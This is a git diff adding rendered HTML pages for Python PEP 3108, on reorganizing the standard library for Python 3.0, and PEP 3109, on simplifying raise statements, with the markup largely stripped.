+ + + + + \ No newline at end of file diff --git a/pep-3108/index.html b/pep-3108/index.html new file mode 100644 index 00000000000..6d2a6eb79cc --- /dev/null +++ b/pep-3108/index.html @@ -0,0 +1,1495 @@ + PEP 3108 – Standard Library Reorganization | peps.python.org
+
+


+ + +
+
+
+

PEP 3108 – Standard Library Reorganization

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2007
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2008
+
+
+
+
+
+

Note

+

The merging of profile/cProfile as of Python 3.3 did not +occur, and thus is considered abandoned (although it would be +acceptable to do in the future).

+
+
+

Abstract

+

Just like the language itself, Python’s standard library (stdlib) has +grown over the years to be very rich. But over time some modules +have lost their need to be included with Python. There has also been +an introduction of a naming convention for modules since Python’s +inception that not all modules follow.

+

Python 3.0 presents a chance to remove modules that do not have +long term usefulness. This chance also allows for the renaming of +modules so that they follow the Python style guide. This +PEP lists modules that should not be included in Python 3.0 or which +need to be renamed.

+
+
+

Modules to Remove

+

Guido pronounced that “silly old stuff” is to be deleted from the +stdlib for Py3K [8]. This is open-ended on purpose. +Each module to be removed needs to have a justification as to why it +should no longer be distributed with Python. This can range from the +module being deprecated in Python 2.x to being for a platform that is +no longer widely used.

+

This section of the PEP lists the various modules to be removed. Each +subsection represents a different reason for modules to be +removed. Each module must have a specific justification on top of +being listed in a specific subsection so as to make sure only modules +that truly deserve to be removed are in fact removed.

+

When a reason mentions how long it has been since a module has been +“uniquely edited”, it is in reference to how long it has been since a +checkin was done specifically for the module and not for a change that +applied universally across the entire stdlib. If an edit time is not +denoted as “unique” then it is the last time the file was edited, +period.

+
+

Previously deprecated [done]

+

PEP 4 lists all modules that have been deprecated in the stdlib. +The specified motivations mirror those listed in +PEP 4. All modules listed +in the PEP at the time of the first alpha release of Python 3.0 will +be removed.

+

The entire contents of lib-old will also be removed. These modules +have already been removed from being imported but are kept in the +distribution for Python for users that rely upon the code.

+
    +
  • cfmfile
      +
    • Documented as deprecated since Python 2.4 without an explicit +reason.
    • +
    +
  • +
  • cl
      +
    • Documented as obsolete since Python 2.0 or earlier.
    • +
    • Interface to SGI hardware.
    • +
    +
  • +
  • md5
      +
    • Supplanted by the hashlib module.
    • +
    +
  • +
  • mimetools
      +
    • Documented as obsolete in a previous version.
    • +
    • Supplanted by the email package.
    • +
    +
  • +
  • MimeWriter
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • mimify
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • multifile
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • posixfile
      +
    • Locking is better done by fcntl.lockf().
    • +
    +
  • +
  • rfc822
      +
    • Supplanted by the email package.
    • +
    +
  • +
  • sha
      +
    • Supplanted by the hashlib package.
    • +
    +
  • +
  • sv
      +
    • Documented as obsolete since Python 2.0 or earlier.
    • +
    • Interface to obsolete SGI Indigo hardware.
    • +
    +
  • +
  • timing
      +
    • Documented as obsolete since Python 2.0 or earlier.
    • +
    • time.clock() gives better time resolution.
    • +
    +
  • +
+
+
+

Platform-specific with minimal use [done]

+

Python supports many platforms, some of which are not widely used or +maintained. On some of these platforms there are modules that have limited use +even to people on those platforms. Because of their limited usefulness, it +would be better to no longer burden the Python development team with +their maintenance.

+

The modules mentioned below are documented. All undocumented modules +for the specified platforms will also be removed.

+
+

IRIX

+

The IRIX operating system is no longer produced [15]. +Removing all modules from the plat-irix[56] directory has been deemed +reasonable because of this fact.

+
    +
  • AL/al
      +
    • Provides sound support on Indy and Indigo workstations.
    • +
    • Both workstations are no longer available.
    • +
    • Code has not been uniquely edited in three years.
    • +
    +
  • +
  • cd/CD
      +
    • CD drive control for SGI systems.
    • +
    • SGI no longer sells machines with IRIX on them.
    • +
    • Code has not been uniquely edited in 14 years.
    • +
    +
  • +
  • cddb
      +
    • Undocumented.
    • +
    +
  • +
  • cdplayer
      +
    • Undocumented.
    • +
    +
  • +
  • cl/CL/CL_old
      +
    • Compression library for SGI systems.
    • +
    • SGI no longer sells machines with IRIX on them.
    • +
    • Code has not been uniquely edited in 14 years.
    • +
    +
  • +
  • DEVICE/GL/gl/cgen/cgensuport
      +
    • GL access, which is the predecessor to OpenGL.
    • +
    • Has not been edited in at least eight years.
    • +
    • Third-party libraries provide better support (PyOpenGL [12]).
    • +
    +
  • +
  • ERRNO
      +
    • Undocumented.
    • +
    +
  • +
  • FILE
      +
    • Undocumented.
    • +
    +
  • +
  • FL/fl/flp
      +
    • Wrapper for the FORMS library [16]
    • +
    • FORMS has not been edited in 12 years.
    • +
    • Library is not widely used.
    • +
    • First eight hits on Google are for Python docs for fl.
    • +
    +
  • +
  • fm
      +
    • Wrapper to the IRIS Font Manager library.
    • +
    • Only available on SGI machines which no longer come with IRIX.
    • +
    +
  • +
  • GET
      +
    • Undocumented.
    • +
    +
  • +
  • GLWS
      +
    • Undocumented.
    • +
    +
  • +
  • imgfile
      +
    • Wrapper for SGI libimage library for imglib image files +(.rgb files).
    • +
    • Python Imaging Library provides read-only support [13].
    • +
    • Not uniquely edited in 13 years.
    • +
    +
  • +
  • IN
      +
    • Undocumented.
    • +
    +
  • +
  • IOCTL
      +
    • Undocumented.
    • +
    +
  • +
  • jpeg
      +
    • Wrapper for JPEG (de)compressor.
    • +
    • Code not uniquely edited in nine years.
    • +
    • Third-party libraries provide better support +(Python Imaging Library [13]).
    • +
    +
  • +
  • panel
      +
    • Undocumented.
    • +
    +
  • +
  • panelparser
      +
    • Undocumented.
    • +
    +
  • +
  • readcd
      +
    • Undocumented.
    • +
    +
  • +
  • SV
      +
    • Undocumented.
    • +
    +
  • +
  • torgb
      +
    • Undocumented.
    • +
    +
  • +
  • WAIT
      +
    • Undocumented.
    • +
    +
  • +
+
+
+

Mac-specific modules

+

The Mac-specific modules are not well-maintained (e.g., the bgen +tool used to auto-generate many of the modules has never been +updated to support UCS-4). It is also not Python’s place to maintain +such a large amount of OS-specific modules. Thus all modules under +Lib/plat-mac and Mac are to be removed.

+

A stub module for proxy access will be provided for use by urllib.

+
    +
  • _builtinSuites
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • Audio_mac
      +
    • Undocumented.
    • +
    +
  • +
  • aepack
      +
    • OSA support is better through third-party modules. +
    • +
    • Hard-coded endianness which breaks on Intel Macs.
    • +
    • Might need to rename if Carbon package dependent.
    • +
    +
  • +
  • aetools
      +
    • See aepack.
    • +
    +
  • +
  • aetypes
      +
    • See aepack.
    • +
    +
  • +
  • applesingle
      +
    • Undocumented.
    • +
    • AppleSingle is a binary file format for A/UX.
    • +
    • A/UX no longer distributed.
    • +
    +
  • +
  • appletrawmain
      +
    • Undocumented.
    • +
    +
  • +
  • appletrunner
      +
    • Undocumented.
    • +
    +
  • +
  • argvemulator
      +
    • Undocumented.
    • +
    +
  • +
  • autoGIL
      +
    • Very bad model for using Python with the CFRunLoop.
    • +
    +
  • +
  • bgenlocations
      +
    • Undocumented.
    • +
    +
  • +
  • buildtools
      +
    • Documented as deprecated since Python 2.3 without an explicit +reason.
    • +
    +
  • +
  • bundlebuilder
      +
    • Undocumented.
    • +
    +
  • +
  • Carbon
      +
    • Carbon development has stopped.
    • +
    • Does not support 64-bit systems completely.
    • +
    • Dependent on bgen which has never been updated to support UCS-4 +Unicode builds of Python.
    • +
    +
  • +
  • CodeWarrior
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • ColorPicker
      +
    • Better to use Cocoa for GUIs.
    • +
    +
  • +
  • EasyDialogs
      +
    • Better to use Cocoa for GUIs.
    • +
    +
  • +
  • Explorer
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • Finder
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • findertools
      +
    • No longer useful.
    • +
    +
  • +
  • FrameWork
      +
    • Poorly documented.
    • +
    • Not updated to support Carbon Events.
    • +
    +
  • +
  • gensuitemodule
      +
    • See aepack.
    • +
    +
  • +
  • ic
  • +
  • icglue
  • +
  • icopen
      +
    • Not needed on OS X.
    • +
    • Meant to replace ‘open’ which is usually a bad thing to do.
    • +
    +
  • +
  • macerrors
      +
    • Undocumented.
    • +
    +
  • +
  • MacOS
      +
    • Would also mean the removal of binhex.
    • +
    +
  • +
  • macostools
  • +
  • macresource
      +
    • Undocumented.
    • +
    +
  • +
  • MiniAEFrame
      +
    • See aepack.
    • +
    +
  • +
  • Nav
      +
    • Undocumented.
    • +
    +
  • +
  • Netscape
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • OSATerminology
  • +
  • pimp
      +
    • Undocumented.
    • +
    +
  • +
  • PixMapWrapper
      +
    • Undocumented.
    • +
    +
  • +
  • StdSuites
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • SystemEvents
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • Terminal
      +
    • Undocumented.
    • +
    • Package under lib-scriptpackages.
    • +
    +
  • +
  • terminalcommand
      +
    • Undocumented.
    • +
    +
  • +
  • videoreader
      +
    • No longer used.
    • +
    +
  • +
  • W
      +
    • No longer distributed with Python.
    • +
    +
  • +
+
+
+

Solaris

+
    +
  • SUNAUDIODEV/sunaudiodev
      +
    • Access to the sound card on Sun machines.
    • +
    • Code not uniquely edited in over eight years.
    • +
    +
  • +
+
+
+
+

Hardly used [done]

+

Some platform-independent modules are rarely used. There are a number of +possible explanations for this, including ease of reimplementation, a very +small audience, or lack of adherence to more modern standards.

+
    +
  • audiodev
      +
    • Undocumented.
    • +
    • Not edited in five years.
    • +
    +
  • +
  • imputil
      +
    • Undocumented.
    • +
    • Never updated to support absolute imports.
    • +
    +
  • +
  • mutex
      +
    • Easy to implement using a semaphore and a queue.
    • +
    • Cannot block on a lock attempt.
    • +
    • Not uniquely edited since its addition 15 years ago.
    • +
    • Only useful with the ‘sched’ module.
    • +
    • Not thread-safe.
    • +
    +
  • +
  • stringold
      +
    • Function versions of the methods on string objects.
    • +
    • Obsolete since Python 1.6.
    • +
    • Any functionality not in the string object or module will be moved +to the string module (mostly constants).
    • +
    +
  • +
  • sunaudio
      +
    • Undocumented.
    • +
    • Not edited in over seven years.
    • +
    • The sunau module provides similar abilities.
    • +
    +
  • +
  • toaiff
      +
    • Undocumented.
    • +
    • Requires sox library to be installed on the system.
    • +
    +
  • +
  • user
      +
    • Easily handled by allowing the application specify its own +module name, check for existence, and import if found.
    • +
    +
  • +
  • new
      +
    • Just a rebinding of names from the ‘types’ module.
    • +
    • Can also call type built-in to get most types easily.
    • +
    • Docstring states the module is no longer useful as of revision +27241 (2002-06-15).
    • +
    +
  • +
  • pure
      +
    • Written before Pure Atria was bought by Rational which was then +bought by IBM (in other words, very old).
    • +
    +
  • +
  • test.testall
      +
    • From the days before regrtest.
    • +
    +
  • +
+
+
+

Obsolete

+

Becoming obsolete signifies that either another module in the stdlib +or a widely distributed third-party library provides a better solution +for what the module is meant for.

+
    +
  • Bastion/rexec [done]
      +
    • Restricted execution / security.
    • +
    • Turned off in Python 2.3.
    • +
    • Modules deemed unsafe.
    • +
    +
  • +
  • bsddb185 [done]
      +
    • Superseded by bsddb3
    • +
    • Not built by default.
    • +
    • Documentation specifies that the “module should never be used +directly in new code”.
    • +
    • Available externally from PyPI.
    • +
    +
  • +
  • Canvas [done] +
  • +
  • commands [done]
      +
    • subprocess module replaces it (PEP 324).
    • +
    • Remove getstatus(), move rest to subprocess.
    • +
    +
  • +
  • compiler [done]
      +
    • Having to maintain both the built-in compiler and the stdlib +package is redundant [20].
    • +
    • The AST created by the compiler is available [19].
    • +
    • Mechanism to compile from an AST needs to be added.
    • +
    +
  • +
  • dircache [done]
      +
    • Negligible use.
    • +
    • Easily replicated.
    • +
    +
  • +
  • dl [done]
      +
    • ctypes provides better support for same functionality.
    • +
    +
  • +
  • fpformat [done]
      +
    • All functionality is supported by string interpolation.
    • +
    +
  • +
  • htmllib [done]
      +
    • Superseded by HTMLParser.
    • +
    +
  • +
  • ihooks [done]
      +
    • Undocumented.
    • +
    • For use with rexec which has been turned off since Python 2.3.
    • +
    +
  • +
  • imageop [done]
      +
    • Better support by third-party libraries +(Python Imaging Library [13]).
    • +
    • +
      Unit tests relied on rgbimg and imgfile.
        +
      • rgbimg was removed in Python 2.6.
      • +
      • imgfile slated for removal in this PEP.
      • +
      +
      +
      +
    • +
    +
  • +
  • linuxaudiodev [done]
      +
    • Replaced by ossaudiodev.
    • +
    +
  • +
  • mhlib [done]
      +
    • Should be removed as an individual module; use mailbox +instead.
    • +
    +
  • +
  • popen2 [done]
      +
    • subprocess module replaces it (PEP 324).
    • +
    +
  • +
  • sgmllib [done]
      +
    • Does not fully parse SGML.
    • +
    • In the stdlib for support to htmllib which is slated for removal.
    • +
    +
  • +
  • sre [done]
      +
    • Previously deprecated; import re instead.
    • +
    +
  • +
  • stat [TODO need to move all uses over to os.stat()]
      +
    • os.stat() now returns a tuple with attributes.
    • +
    • Functions in the module should be made into methods for the object +returned by os.stat.
    • +
    +
  • +
  • statvfs [done]
      +
    • os.statvfs now returns a tuple with attributes.
    • +
    +
  • +
  • thread [done]
      +
    • People should use ‘threading’ instead.
        +
      • Rename ‘thread’ to _thread.
      • +
      • Deprecate dummy_thread and rename _dummy_thread.
      • +
      • Move thread.get_ident over to threading.
      • +
      +
    • +
    • Guido has previously supported the deprecation +[9].
    • +
    +
  • +
  • urllib [done]
      +
    • Superseded by urllib2.
    • +
    • Functionality unique to urllib will be kept in the +urllib package.
    • +
    +
  • +
  • UserDict [done: 3.0] [TODO handle 2.6]
      +
    • Not as useful since types can be a superclass.
    • +
    • Useful bits moved to the ‘collections’ module.
    • +
    +
  • +
  • UserList/UserString [done]
      +
    • Not useful since types can be a superclass.
    • +
    • Moved to the ‘collections’ module.
    • +
    +
  • +
+
+
+

Maintenance Burden

+

Over the years, certain modules have become a heavy burden upon +python-dev to maintain. In situations like this, it is better for the +module to be given to the community to maintain to free python-dev to +focus more on language support and other modules in the standard +library that do not take up an undue amount of time and effort.

+
    +
  • bsddb3
      +
    • Externally maintained at +http://www.jcea.es/programacion/pybsddb.htm .
    • +
    • Consistent testing instability.
    • +
    • Berkeley DB follows a different release schedule than Python, +leading to the bindings not necessarily being in sync with what is +available.
    • +
    +
  • +
+
+
+
+

Modules to Rename

+

Many modules existed in +the stdlib before PEP 8 came into existence. This has +led to some naming inconsistencies and namespace bloat that should be +addressed.

+
+

PEP 8 violations [done]

+

PEP 8 specifies that modules “should have short, all-lowercase names” where “underscores can be used … if it improves readability”. The use of underscores is discouraged in package names. The following modules violate PEP 8 and are not otherwise being renamed by being moved into a package.

+ + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
_winregwinreg
ConfigParserconfigparser
copy_regcopyreg
Queuequeue
SocketServersocketserver
+
+
+

Merging C and Python implementations of the same interface

+

Several interfaces have both a Python and C implementation. While it +is great to have a C implementation for speed with a Python +implementation as fallback, there is no need to expose the two +implementations independently in the stdlib. For Python 3.0 all +interfaces with two implementations will be merged into a single +public interface.

+

The C module is to be given a leading underscore to delineate the fact +that it is not the reference implementation (the Python implementation +is). This means that any semantic difference between the C and Python +versions must be dealt with before Python 3.0 or else the C +implementation will be removed until it can be fixed.
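To make the mechanics concrete, here is a minimal sketch of how such a merged module can be arranged, using the pickle/_pickle pair from the list below (the exact layout in the stdlib may differ):

# pickle.py -- the public module holds the Python reference implementation
class Pickler:
    """Pure-Python reference implementation."""

# At the bottom of the module, prefer the C accelerator when it is built:
try:
    from _pickle import *   # shadows the Python definitions above
except ImportError:
    pass                    # no C version available; keep the Python code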

+

One interface that is not listed below is xml.etree.ElementTree. This +is an externally maintained module and thus is not under the direct +control of the Python development team for renaming. See Open +Issues for a discussion on this.

+
    +
  • pickle/cPickle [done]
      +
    • Rename cPickle to _pickle.
    • +
    • Semantic completeness of C implementation not verified.
    • +
    +
  • +
  • profile/cProfile [TODO]
      +
    • Rename cProfile to _profile.
    • +
    • Semantic completeness of C implementation not verified.
    • +
    +
  • +
  • StringIO/cStringIO [done]
      +
    • Add the class to the ‘io’ module.
    • +
    +
  • +
+
+
+

No public, documented interface [done]

+

There are several modules in the stdlib that have no defined public +interface. These modules exist as support code for other modules that +are exposed. Because they are not meant to be used directly they +should be renamed to reflect this fact.

+ + + + + + + + + + + +
Current NameReplacement Name
markupbase_markupbase
+
+
+

Poorly chosen names [done]

+

A few modules have names that were poorly chosen in hindsight. They +should be renamed so as to prevent their bad name from perpetuating +beyond the 2.x series.

+ + + + + + + + + + + + + + +
Current NameReplacement Name
reprreprlib
test.test_supporttest.support
+
+
+

Grouping of modules [done]

+

As the stdlib has grown, several areas within it have expanded to +include multiple modules (e.g., support for database files). It +thus makes sense to group related modules into packages.

+
+

dbm package

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
anydbmdbm.__init__ [1]
dbhashdbm.bsd
dbmdbm.ndbm
dumbdbmdbm.dumb
gdbmdbm.gnu
whichdbdbm.__init__ [1]
+ +
+
+

html package

+ + + + + + + + + + + + + + +
Current NameReplacement Name
HTMLParserhtml.parser
htmlentitydefshtml.entities
+
+
+

http package

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
httplibhttp.client
BaseHTTPServerhttp.server [2]
CGIHTTPServerhttp.server [2]
SimpleHTTPServerhttp.server [2]
Cookiehttp.cookies
cookielibhttp.cookiejar
+ +
+
+

tkinter package

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
Dialogtkinter.dialog
FileDialogtkinter.filedialog [4]
FixTktkinter._fix
ScrolledTexttkinter.scrolledtext
SimpleDialogtkinter.simpledialog [5]
Tixtkinter.tix
Tkconstantstkinter.constants
Tkdndtkinter.dnd
Tkintertkinter.__init__
tkColorChoosertkinter.colorchooser
tkCommonDialogtkinter.commondialog
tkFileDialogtkinter.filedialog [4]
tkFonttkinter.font
tkMessageBoxtkinter.messagebox
tkSimpleDialogtkinter.simpledialog [5]
turtletkinter.turtle
+ +
+
+

urllib package

+

Originally this new package was to be named url, but because of +the common use of the name as a variable, it has been deemed better +to keep the name urllib and instead shift existing modules around +into a new package.

+ + + + + + + + + + + + + + + + + + + + +
Current NameReplacement Name
urllib2urllib.request, urllib.error
urlparseurllib.parse
urlliburllib.parse, urllib.request, urllib.error [6]
robotparserurllib.robotparser
+ +
+
+

xmlrpc package

+ + + + + + + + + + + + + + + + + +
Current NameReplacement Name
xmlrpclibxmlrpc.client
DocXMLRPCServerxmlrpc.server [3]
SimpleXMLRPCServerxmlrpc.server [3]
+ +
+
+
+
+

Transition Plan

+
+

Issues

+

Issues related to this PEP:

+ +
+
+

For modules to be removed

+

For module removals, it is easiest to remove the module first in +Python 3.0 to see where dependencies exist. This makes finding +code that (possibly) requires the suppression of the +DeprecationWarning easier.

+
+

In Python 3.0

+
    +
  1. Remove the module.
  2. +
  3. Remove related tests.
  4. +
  5. Remove all documentation (typically the module’s documentation +file and its entry in a file for the Library Reference).
  6. +
  7. Edit Modules/Setup.dist and setup.py if needed.
  8. +
  9. Run the regression test suite (using -uall); watch out for +tests that are skipped because an import failed for the removed +module.
  10. +
  11. Check in the change (with an appropriate Misc/NEWS entry).
  12. +
  13. Update this PEP noting that the 3.0 step is done.
  14. +
+
+
+

In Python 2.6

+
    +
  1. Add the following code to the deprecated module, if it is implemented in Python, as the first piece of executed code (adjusting the module name and the warnings import as needed):
    from warnings import warnpy3k
    +warnpy3k("the XXX module has been removed in Python 3.0",
    +         stacklevel=2)
    +del warnpy3k
    +
    +
    +

    or the following if it is an extension module:

    +
    if (PyErr_WarnPy3k("the XXX module has been removed in "
    +                   "Python 3.0", 2) < 0)
    +    return;
    +
    +
    +

    (the Python-Dev TextMate bundle, available from Misc/TextMate, +contains a command that will generate all of this for you).

    +
  2. +
  3. Update the documentation. For modules with their own documentation file, use the :deprecated: option with the module directive along with the deprecated directive, stating that the deprecation is occurring in 2.6 in preparation for the module’s removal in 3.0:
    .. deprecated:: 2.6
    +   The :mod:`XXX` module has been removed in Python 3.0.
    +
    +
    +

    For modules simply listed in a file (e.g., undoc.rst), use the +warning directive.

    +
  4. +
  5. Add the module to the module deletion test in test_py3kwarn.
  6. +
  7. +
    Suppress the warning in the module’s test code using
    test.test_support.import_module(name, deprecated=True).
    +
    +
  8. +
  9. Check in the change w/ appropriate Misc/NEWS entry (block +this checkin in py3k!).
  10. +
  11. Update this PEP noting that the 2.6 step is done.
  12. +
+
+
+
+

Renaming of modules

+

Support in the 2to3 refactoring tool for renames will be used to help people transition to new module names [11]. Import statements will be rewritten so that only the import statement and none of the rest of the code needs to be touched. This will be accomplished by using the as keyword in import statements to bind the old name in the module namespace while importing based on the new name (when the as keyword is not already used; otherwise the reassigned name should be left alone and only the module that is imported needs to be changed). The fix_imports fixer is an example of how to approach this, sketched below.
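As a sketch of the scheme just described, using one of the renames from the tables above (the fixer’s actual output may differ in detail):

# Python 2 source:
import ConfigParser
cfg = ConfigParser.ConfigParser()

# After the rename fixer binds the old name with 'as':
import configparser as ConfigParser
cfg = ConfigParser.ConfigParser()   # the rest of the code is untouched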

+
+

Python 3.0

+
    +
  1. Update 2to3 in the sandbox to support the rename.
  2. +
  3. Use svn move to rename the module.
  4. +
  5. Update all import statements in the stdlib to use the new name +(use 2to3’s fix_imports fixer for the easiest solution).
  6. +
  7. Rename the module in its own documentation.
  8. +
  9. Update all references in the documentation from the old name to +the new name.
  10. +
  11. Run regrtest.py -uall to verify the rename worked.
  12. +
  13. Add an entry in Misc/NEWS.
  14. +
  15. Commit the changes.
  16. +
+
+
+

Python 2.6

+
    +
  1. In the module’s documentation, add a note mentioning that the module is +renamed in Python 3.0:
    .. note::
    +   The :mod:`OLDNAME` module has been renamed to :mod:`NEWNAME` in
    +   Python 3.0.
    +
    +
    +
  2. +
  3. Commit the documentation change.
  4. +
  5. Block the revision in py3k.
  6. +
+
+
+
+
+

Open Issues

+
+

Renaming of modules maintained outside of the stdlib

+

xml.etree.ElementTree not only does not meet PEP 8 naming standards, but it also has an exposed C implementation. It is an externally maintained package, per PEP 360. A request will be made for the maintainer to change the name so that it matches PEP 8 and hides the C implementation.

+
+
+
+

Rejected Ideas

+
+

Modules that were originally suggested for removal

+
    +
  • asynchat/asyncore
      +
    • Josiah Carlson has said he will maintain the modules.
    • +
    +
  • +
  • audioop/sunau/aifc
      +
    • Audio modules where the formats are still used.
    • +
    +
  • +
  • base64/quopri/uu
      +
    • All still widely used.
    • +
    • ‘codecs’ module does not provide as nice of an API for basic +usage.
    • +
    +
  • +
  • fileinput
      +
    • Useful when having to work with stdin.
    • +
    +
  • +
  • linecache
      +
    • Used internally in several places.
    • +
    +
  • +
  • nis
      +
    • Testimonials from people indicate that new installations of NIS are still occurring.
    • +
    +
  • +
  • getopt
      +
    • Simpler than optparse.
    • +
    +
  • +
  • repr
      +
    • Useful as a basis for overriding.
    • +
    • Used internally.
    • +
    +
  • +
  • sched
      +
    • Useful for simulations.
    • +
    +
  • +
  • symtable/_symtable
      +
    • Docs were written.
    • +
    +
  • +
  • telnetlib
      +
    • Really handy for quick-and-dirty remote access.
    • +
    • Some hardware supports using telnet for configuration and +querying.
    • +
    +
  • +
  • Tkinter
      +
    • Would prevent IDLE from existing.
    • +
    • No GUI toolkit would be available out of the box.
    • +
    +
  • +
+
+
+

Introducing a new top-level package

+

It has been suggested that the entire stdlib be placed within its own +package. This PEP will not address this issue as it has its own +design issues (naming, does it deserve special consideration in import +semantics, etc.). Everything within this PEP can easily be handled if +a new top-level package is introduced.

+
+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3108.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3109/index.html b/pep-3109/index.html
new file mode 100644
index 00000000000..86320bd71fb
--- /dev/null
+++ b/pep-3109/index.html
@@ -0,0 +1,383 @@
PEP 3109 – Raising Exceptions in Python 3000 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3109 – Raising Exceptions in Python 3000

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Jan-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces changes to Python’s mechanisms for raising +exceptions intended to reduce both line noise and the size of the +language.

+
+
+

Rationale

+

One of Python’s guiding maxims is “there should be one – and +preferably only one – obvious way to do it”. Python 2.x’s +raise statement violates this principle, permitting multiple +ways of expressing the same thought. For example, these statements +are equivalent:

+
raise E, V
+
+raise E(V)
+
+
+

There is a third form of the raise statement, allowing arbitrary +tracebacks to be attached to an exception [1]:

+
raise E, V, T
+
+
+

where T is a traceback. As specified in PEP 344, +exception objects in Python 3.x will possess a __traceback__ +attribute, admitting this translation of the three-expression +raise statement:

+
raise E, V, T
+
+
+

is translated to

+
e = E(V)
+e.__traceback__ = T
+raise e
+
+
+

Using these translations, we can reduce the raise statement from +four forms to two:

+
    +
  1. raise (with no arguments) is used to re-raise the active +exception in an except suite.
  2. +
  3. raise EXCEPTION is used to raise a new exception. This form has +two sub-variants: EXCEPTION may be an exception class or an +instance of an exception class; valid exception classes are +BaseException and its subclasses (PEP 352). If EXCEPTION +is a subclass, it will be called with no arguments to obtain +an exception instance.

    To raise anything else is an error.

    +
  4. +
+

There is a further, more tangible benefit to be obtained through this +consolidation, as noted by A.M. Kuchling [2].

+
PEP 8 doesn't express any preference between the
+two forms of raise statements:
+raise ValueError, 'blah'
+raise ValueError("blah")
+
+I like the second form better, because if the exception arguments
+are long or include string formatting, you don't need to use line
+continuation characters because of the containing parens.
+
+
+

The BDFL has concurred [3] and endorsed the +consolidation of the several raise forms.

+
+
+

Grammar Changes

+

In Python 3, the grammar for raise statements will change +from [1]

+
raise_stmt: 'raise' [test [',' test [',' test]]]
+
+
+

to

+
raise_stmt: 'raise' [test]
+
+
+
+
+

Changes to Builtin Types

+

Because of its relation to exception raising, the signature for the +throw() method on generator objects will change, dropping the +optional second and third parameters. The signature thus changes (PEP 342) +from

+
generator.throw(E, [V, [T]])
+
+
+

to

+
generator.throw(EXCEPTION)
+
+
+

Where EXCEPTION is either a subclass of BaseException or an +instance of a subclass of BaseException.
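For illustration, a short sketch of the new single-argument form (assuming Python 3 semantics):

def gen():
    try:
        yield 1
    except ValueError as exc:
        yield 'caught: %s' % exc

g = gen()
next(g)                             # advance to the first yield
print(g.throw(ValueError('boom')))  # raises ValueError inside gen -> 'caught: boom'
# g.throw(ValueError) is also accepted: the class is called with no
# arguments to obtain the exception instance.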

+
+
+

Semantic Changes

+

In Python 2, the following raise statement is legal

+
raise ((E1, (E2, E3)), E4), V
+
+
+

The interpreter will take the tuple’s first element as the exception +type (recursively), making the above fully equivalent to

+
raise E1, V
+
+
+

As of Python 3.0, support for raising tuples like this will be +dropped. This change will bring raise statements into line with +the throw() method on generator objects, which already disallows +this.

+
+
+

Compatibility Issues

+

All two- and three-expression raise statements will require +modification, as will all two- and three-expression throw() calls +on generators. Fortunately, the translation from Python 2.x to +Python 3.x in this case is simple and can be handled mechanically +by Guido van Rossum’s 2to3 utility [4] using the raise and +throw fixers ([5], [6]).

+

The following translations will be performed:

+
    +
  1. Zero- and one-expression raise statements will be left +intact.
  2. +
  3. Two-expression raise statements will be converted from
    raise E, V
    +
    +
    +

    to

    +
    raise E(V)
    +
    +
    +

    Two-expression throw() calls will be converted from

    +
    generator.throw(E, V)
    +
    +
    +

    to

    +
    generator.throw(E(V))
    +
    +
    +

    See point #5 for a caveat to this transformation.

    +
  4. +
  5. Three-expression raise statements will be converted from
    raise E, V, T
    +
    +
    +

    to

    +
    e = E(V)
    +e.__traceback__ = T
    +raise e
    +
    +
    +

    Three-expression throw() calls will be converted from

    +
    generator.throw(E, V, T)
    +
    +
    +

    to

    +
    e = E(V)
    +e.__traceback__ = T
    +generator.throw(e)
    +
    +
    +

    See point #5 for a caveat to this transformation.

    +
  6. +
  7. Two- and three-expression raise statements where E is a +tuple literal can be converted automatically using 2to3’s +raise fixer. raise statements where E is a non-literal +tuple, e.g., the result of a function call, will need to be +converted manually.
  8. +
  9. Two- and three-expression raise statements where E is an +exception class and V is an exception instance will need +special attention. These cases break down into two camps:
      +
    1. raise E, V as a long-hand version of the zero-argument +raise statement. As an example, assuming F is a subclass +of E
      try:
      +    something()
      +except F as V:
      +    raise F(V)
      +except E as V:
      +    handle(V)
      +
      +
      +

      This would be better expressed as

      +
      try:
      +    something()
      +except F:
      +    raise
      +except E as V:
      +    handle(V)
      +
      +
      +
    2. +
    3. raise E, V as a way of “casting” an exception to another +class. Taking an example from +distutils.compiler.unixcompiler
      try:
      +    self.spawn(pp_args)
      +except DistutilsExecError as msg:
      +    raise CompileError(msg)
      +
      +
      +

      This would be better expressed as

      +
      try:
      +    self.spawn(pp_args)
      +except DistutilsExecError as msg:
      +    raise CompileError from msg
      +
      +
      +

      Using the raise ... from ... syntax introduced in +PEP 344.

      +
    4. +
    +
  10. +
+
+
+

Implementation

+

This PEP was implemented in revision 57783 [7].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3109.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3110/index.html b/pep-3110/index.html
new file mode 100644
index 00000000000..543281545b1
--- /dev/null
+++ b/pep-3110/index.html
@@ -0,0 +1,405 @@
